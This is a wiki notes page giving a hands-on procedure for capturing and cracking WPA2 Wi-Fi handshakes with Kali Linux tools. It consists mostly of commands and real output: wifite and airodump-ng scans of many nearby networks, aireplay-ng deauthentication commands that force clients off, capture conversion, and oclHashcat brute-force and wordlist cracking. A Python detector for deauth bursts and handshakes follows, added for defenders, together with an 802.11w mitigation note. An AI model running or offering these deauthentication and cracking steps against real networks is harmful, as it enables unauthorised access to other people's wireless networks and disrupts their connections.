capture_wpa_handshake
Capture WPA2 handshake
Hardware
- Intel NUC
- Intel Centrino 6235
Install Kali
- Install Kali from USB.
- Create user account.
- Update.
  apt-get update
  apt-get upgrade
- Install and enable SSHd.
  apt-get install ssh
  /etc/init.d/ssh start
  update-rc.d ssh enable
Capture with wifite
- Start scanning.
  # wifite wpa2
  [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
     NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
     --- --------------------  --  ----  -----  ----  ------
       1 -------                1  WPA2   34db  no    client
       2 -------               13  WPA2   34db  no    clients
       3 UPC245788570          11  WPA2   30db  wps
       4 UPC486785_EXT         11  WPA2   26db  wps
       5 UPC WifiSpots         11  WPA2   25db  no
       6 UPC486785             11  WPA2   22db  no    clients
       7 -------               11  WPA2   21db  no
       8 UPC1461170             1  WPA2   19db  no    clients
       9 VGV7519558FA2          6  WPA2   18db  wps
      10 UPC WifiSpots          1  WPA2   18db  no
      11 -------               11  WPA2   18db  no    client
      12 UPC501677338          36  WPA2   17db  no
      13 UPC245248760           6  WPA2   16db  wps   client
      14 -------              100  WPA2   15db  no
      15 H368N67798A            6  WPA2   13db  wps
      16 Ka1717169              9  WPA2   13db  no    client
      17 UPC249259973          11  WPA2   13db  wps   client
      18 UPC244634263          11  WPA2   13db  wps
      19 UPC240228706           1  WPA2   13db  wps   client
      20 UPC WifiSpots          9  WPA2   12db  no
      21 UPC1263286             6  WPA2   11db  no
      22 UPC2176918             6  WPA2   11db  no
      23 UPC WifiSpots          6  WPA2   11db  no
      24 -------                6  WPA2   10db  wps
      25 -------                1  WPA2   10db  wps
      26 Sitecom8CF98C          8  WPA2   10db  wps
      27 -------                1  WPA2    9db  no
      28 -------                6  WPA2    9db  no
      29 UPC247811359           1  WPA2    9db  wps   clients
      30 UPC241613374          11  WPA2    9db  wps
      31 UPC0988912            13  WPA2    7db  no    client
  [0:01:54] scanning wireless networks. 31 targets and 15 clients found
  [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
- Press Ctrl-C when ready.
- Enter target number.
  [+] select target numbers (1-19) separated by commas, or 'all': 2
  [+] 1 target selected.
  [0:08:20] starting wpa handshake capture on "--------"
  [0:08:09] new client found: 04:F7:E4:51:E7:A8
  [0:08:08] listening for handshake...
  [0:00:12] handshake captured! saved as "hs/--------.cap"
  [+] 1 attack completed:
  [+] 1/1 WPA attacks succeeded
      Schenkel (D4:CA:6D:53:23:41) handshake captured saved as hs/--------.cap
  [+] starting WPA cracker on 1 handshake
  [!] no WPA dictionary found! use -dict <file> command-line argument
  [+] quitting
- Clean the capture file.
  # wpaclean cleanwpa.cap --------.cap
  Pwning --------.cap (1/1 100%)
  Net d4:ca:6d:53:23:41 --------
  Done
- Convert the .cap file to .hccap format for oclHashcat.
  # aircrack-ng cleanwpa.cap -J out
  Opening cleanwpa.cap
  Read 3 packets.

     #  BSSID              ESSID                     Encryption

     1  D4:CA:6D:53:23:41  --------                  WPA (1 handshake)

  Choosing first network as target.

  Opening cleanwpa.cap
  Reading packets, please wait...

  Building Hashcat (1.00) file...

  [*] ESSID (length: 8): --------
  [*] Key version: 2
  [*] BSSID: D4:CA:6D:53:23:41
  [*] STA: 04:F7:E4:51:E7:A8
  [*] anonce:
      3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
      -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
  [*] snonce:
      C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
      -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
  [*] Key MIC:
      AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
  [*] eapol:
      01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
      -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
      -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
      4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
      04 01 00 00 0F AC 02 0C 00

  Successfully written to out.hccap

  Quitting aircrack-ng...
- Try cracking with oclHashcat (brute-force mask).
  oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1

  Session.Name...: oclHashcat
  Status.........: Aborted
  Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
  Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
  Hash.Type......: WPA/WPA2
  Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
  Time.Estimated.: > 10 Years
  Speed.GPU.#1...: 126.6 kH/s
  Speed.GPU.#2...: 129.0 kH/s
  Speed.GPU.#3...: 129.2 kH/s
  Speed.GPU.#4...: 124.4 kH/s
  Speed.GPU.#5...: 129.1 kH/s
  Speed.GPU.#6...: 129.0 kH/s
  Speed.GPU.#*...: 767.2 kH/s
  Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
  Progress.......: 94814208/16533293572437839872 (0.00%)
  Skipped........: 0/94814208 (0.00%)
  Rejected.......: 0/94814208 (0.00%)
  HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
  HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
  HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
  HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
  HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
  HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan

  Started: Thu Jun 12 22:01:32 2014
  Stopped: Thu Jun 12 22:03:40 2014
- Or try a wordlist with rules.
  oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt
Capture with airmon-ng / airodump-ng
- Enable monitor mode on the WiFi interface.
  # airmon-ng start wlan0

  Found 2 processes that could cause trouble.
  If airodump-ng, aireplay-ng or airtun-ng stops working after
  a short period of time, you may want to kill (some of) them!
  -e
  PID     Name
  2506    NetworkManager
  2633    wpa_supplicant

  Interface       Chipset         Driver

  wlan0           Intel 6235      iwlwifi - [phy0]
                                  (monitor mode enabled on mon0)
- Find nearby wireless networks. If targeting a specific AP, fix the channel with '-c <chan_num>'.
  # airodump-ng mon0

  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06

  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

  D4:CA:6D:53:23:41  -61      158       25    0  13  54e. WPA2 CCMP   PSK  --------
  D4:CA:6D:52:5D:E9  -61      141       13    0   1  54e. WPA2 CCMP   PSK  --------
  DC:71:44:DE:35:F8  -66      234        0    0  11  54e  WPA2 CCMP   PSK  UPC245788570
  04:A1:51:22:3A:34  -76      158        8    0  11  54e  WPA2 CCMP   PSK  UPC486785_EXT
  EA:40:F2:B1:A3:E7  -76      131        0    0  11  54e  WPA2 CCMP   MGT  UPC WifiSpots
  E8:40:F2:B1:A3:E5  -78      134        9    0  11  54e  WPA2 CCMP   PSK  UPC486785
  CE:BC:C8:FE:EA:C3  -80       85        0    0  11  54e. WPA2 CCMP   PSK  --------
  C8:BC:C8:FE:EA:C3  -80       93        2    0  11  54e. WPA2 CCMP   PSK  --------
  44:32:C8:FC:EB:9B  -84       40        0    0   1  54e  WPA2 CCMP   PSK  UPC1461170
  88:03:55:55:8F:A2  -83       61        0    0   6  54e  WPA2 CCMP   PSK  VGV7519558FA2
  5C:A3:9D:80:A3:98  -83       44        0    0   6  54e  WPA2 CCMP   PSK  UPC245248760
  46:32:C8:FC:EB:9D  -85       40        0    0   1  54e  WPA2 CCMP   MGT  UPC WifiSpots
  8C:E0:81:67:79:8A  -86       20        0    0   6  54e  WPA2 CCMP   PSK  H368N67798A
  14:49:E0:A4:70:28  -86       13        3    0  11  54e  WPA2 CCMP   PSK  UPC249259973
  5C:A3:9D:98:21:F8  -86       17        0    0  11  54e  WPA2 CCMP   PSK  UPC244634263
  5C:A3:9D:FD:13:E8  -85       36        0    0   1  54e  WPA2 CCMP   PSK  UPC240228706
  00:0C:F6:91:6A:78  -88       22        1    0  11  54e. WPA2 CCMP   PSK  Sitecom916A78
  C4:27:95:75:D8:95   -1        0        0    0   7  -1                    <length:  0>
  DC:71:44:A8:08:88  -90        2        0    0   1  54e  WPA2 CCMP   PSK  UPC242046314
  CE:BC:C8:FE:EA:C4  -86        1        0    0 100  54e  WPA2 CCMP   PSK  --------
  DC:71:44:DE:35:F0  -84        1        0    0  36  54e  WPA2 CCMP   PSK  UPC501677338

  BSSID              STATION            PWR   Rate    Lost  Frames  Probe

  (not associated)   14:99:E2:43:58:65  -82    0 - 1      0      11  UPC1461170
  (not associated)   F0:25:B7:EB:D2:83  -90    0 - 1      0       1  H368N67798A
  D4:CA:6D:53:23:41  74:E1:B6:95:01:69  -71    0e- 0      0       9
  D4:CA:6D:53:23:41  04:F7:E4:51:E7:A8  -84    0 -24     10       8  --------
  E8:40:F2:B1:A3:E5  04:A1:51:22:3A:34   -1    0e- 0      0       1
  C8:BC:C8:FE:EA:C3  F0:27:65:D7:0D:09  -86    0 - 1      0       1
  44:32:C8:FC:EB:9B  A4:D1:D2:6A:1B:1D   -1    1e- 0      0       1
  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0       1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e     0       4
- Dump packets from the target channel.
  # airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0
- Wait for a handshake... or
- Deauthenticate a client from the network.
  # aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
- Or, if you don't know the MAC of any associated client, broadcast a deauth.
  # aireplay-ng --deauth 0 -a <AP_MAC> mon0
- Extract the handshake: keep only the EAPOL frames plus the beacons (type/subtype 0x08), which carry the ESSID. The filter has to be quoted so the shell does not interpret the '||'.
  tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x08" -w <output file name>
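As an added example from the defender's side of the procedure above (not code from the original page or from the aircrack-ng/wifite tools), here is a small Python monitor that turns the two artifacts the page relies on into detection logic. It parses raw 802.11 frames (no radiotap header assumed), flags a burst of deauthentication frames against one BSSID such as the aireplay-ng step generates, decodes EAPOL-Key flags into 4-way handshake message numbers as the tshark/wpaclean steps depend on, and raises a higher-severity alert when a complete handshake immediately follows a deauth burst. The MAC addresses, thresholds and the frames themselves are constructed for the demo; `HandshakeMonitor`, `parse_frame` and the helper names are this example's own.

```python
import struct
from collections import defaultdict

# 802.11 frame-control byte 0 = (subtype << 4) | (type << 2) | protocol version:
# 0xC0 is a management/deauthentication frame, 0x08 a plain data frame.
DEAUTH_FC0, DATA_FC0 = 0xC0, 0x08
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header with EtherType 0x888E
# EAPOL-Key "Key Information" bits (IEEE 802.11 RSN key descriptor)
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200

def mac(text):
    return bytes.fromhex(text.replace(":", ""))

def handshake_message(key_info):
    """Map EAPOL-Key flags to the 4-way handshake message number (WPA2 semantics)."""
    ack, mic, secure = key_info & KI_ACK, key_info & KI_MIC, key_info & KI_SECURE
    if ack and not mic:
        return 1   # M1, AP -> STA, carries the ANonce
    if ack and mic:
        return 3   # M3, AP -> STA, Install bit set, GTK in the key data
    if mic and not secure:
        return 2   # M2, STA -> AP, carries the SNonce and the first MIC
    return 4       # M4, STA -> AP, Secure bit set

def parse_frame(raw):
    """Return ('deauth', addr1, addr2, bssid, reason), ('eapol', addr1, addr2, bssid, msg) or None."""
    if len(raw) < 24:
        return None
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    if ftype == 0 and subtype == 12 and len(raw) >= 26:      # management / deauthentication
        return ("deauth", a1, a2, a3, struct.unpack_from("<H", raw, 24)[0])
    if ftype == 2:                                           # data frame: look for EAPOL-Key
        ds = fc1 & 0x03                                      # To-DS / From-DS bits select the BSSID slot
        bssid = a1 if ds == 0x01 else a2 if ds == 0x02 else a3
        off = 24 + (2 if subtype & 0x8 else 0) + (6 if ds == 0x03 else 0)   # QoS control / addr4
        if raw[off:off + 8] != LLC_SNAP_EAPOL or len(raw) < off + 15 or raw[off + 9] != 3:
            return None                                      # EAPOL packet type 3 = EAPOL-Key
        key_info = struct.unpack_from(">H", raw, off + 13)[0]
        return ("eapol", a1, a2, bssid, handshake_message(key_info))
    return None

class HandshakeMonitor:
    """Flags deauthentication bursts and 4-way handshakes that follow one."""
    def __init__(self, burst_window=5.0, burst_threshold=5, rekey_window=60.0):
        self.burst_window, self.burst_threshold, self.rekey_window = burst_window, burst_threshold, rekey_window
        self.deauth_times = defaultdict(list)   # bssid -> recent deauth timestamps
        self.burst_at = {}                      # bssid -> time of the last burst alert
        self.messages = defaultdict(set)        # (bssid, client) -> handshake messages seen
        self.alerts = []

    def feed(self, ts, raw):
        event = parse_frame(raw)
        if event is None:
            return
        kind, a1, a2, bssid, value = event
        if kind == "deauth":
            times = self.deauth_times[bssid]
            times.append(ts)
            while ts - times[0] > self.burst_window:          # slide the window
                times.pop(0)
            if len(times) >= self.burst_threshold and ts - self.burst_at.get(bssid, float("-inf")) > self.burst_window:
                self.burst_at[bssid] = ts
                self.alerts.append(("deauth_burst", bssid, len(times), value))   # value = reason code
            return
        client = a2 if a1 == bssid else a1         # the non-AP side of the EAPOL exchange
        seen = self.messages[(bssid, client)]
        if value == 1:
            seen.clear()                           # M1 starts a fresh exchange
        seen.add(value)
        if {2, 3} <= seen:                         # M2+M3 together are enough for an offline check
            since_burst = ts - self.burst_at.get(bssid, float("-inf"))
            label = "handshake_after_deauth" if since_burst <= self.rekey_window else "handshake"
            self.alerts.append((label, bssid, client))
            seen.clear()

def deauth_frame(addr1, addr2, bssid, reason=7):
    """Constructed deauth frame: FC, duration, three addresses, seq-ctrl, little-endian reason code."""
    header = bytes([DEAUTH_FC0, 0]) + b"\0\0" + mac(addr1) + mac(addr2) + mac(bssid) + b"\0\0"
    return header + struct.pack("<H", reason)

def eapol_key_frame(addr1, addr2, bssid, key_info, from_ds):
    """Constructed data frame carrying an EAPOL-Key packet with the given Key Information flags."""
    header = bytes([DATA_FC0, 0x02 if from_ds else 0x01]) + b"\0\0" + mac(addr1) + mac(addr2) + mac(bssid) + b"\0\0"
    # RSN descriptor type 2, key info, then 90 zeroed bytes (key length .. MIC) and an empty key data field
    body = bytes([2]) + struct.pack(">H", key_info) + bytes(90) + struct.pack(">H", 0)
    return header + LLC_SNAP_EAPOL + bytes([2, 3]) + struct.pack(">H", len(body)) + body

def demo():
    """Constructed trace: six broadcast deauths from the AP, then a fresh 4-way handshake."""
    ap, sta, bcast = "02:00:00:00:00:01", "02:00:00:00:00:02", "ff:ff:ff:ff:ff:ff"   # made-up addresses
    trace = [(0.1 * i, deauth_frame(bcast, ap, ap)) for i in range(6)]
    trace += [
        (2.0, eapol_key_frame(sta, ap, ap, KI_ACK, True)),                                    # M1
        (2.1, eapol_key_frame(ap, sta, ap, KI_MIC, False)),                                   # M2
        (2.2, eapol_key_frame(sta, ap, ap, KI_ACK | KI_MIC | KI_INSTALL | KI_SECURE, True)),  # M3
        (2.3, eapol_key_frame(ap, sta, ap, KI_MIC | KI_SECURE, False)),                       # M4
    ]
    monitor = HandshakeMonitor()
    for ts, frame in trace:
        monitor.feed(ts, frame)
    return monitor.alerts   # [("deauth_burst", ap, 5, 7), ("handshake_after_deauth", ap, sta)]
```

Running `demo()` yields one "deauth_burst" alert when the fifth deauth lands inside the 5 s window and one "handshake_after_deauth" alert as soon as M2 and M3 have both been seen for the client, which is exactly the sequence the aireplay-ng plus airodump-ng steps produce on the air. The same Key Information decoding is what lets a capture be judged as "WPA (1 handshake)" in the aircrack-ng output above. On the mitigation side, enabling 802.11w (Protected Management Frames) makes deauthentication and disassociation frames authenticated, so a client ignores forged ones and the burst never triggers a rekey.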
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1